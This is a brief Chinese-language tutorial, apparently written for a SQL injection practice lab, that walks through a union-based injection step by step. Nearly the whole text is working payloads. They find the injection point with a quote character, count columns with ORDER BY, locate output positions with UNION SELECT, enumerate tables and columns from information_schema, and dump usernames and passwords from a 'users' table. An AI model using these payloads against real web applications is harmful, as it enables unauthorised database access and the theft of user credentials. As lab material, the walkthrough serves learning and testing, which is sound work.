注入语句为:
id=1' and 1=1 -- -
1.判断注入点
2、把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入
3、确定注入字符后,判断有多少列, 超出列数会报错:id=1' order by 4 -- -
4、判断数据显示点:id=0' union select 1,2,3 -- -
5、然后便可在注入字符后加入前面的sql注入基本语句
order by 4 -- -
判断有多少列
union select 1,2,3 -- -
判断数据显示点
union select 1,user(),database() -- -
显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -
查看账号密码信息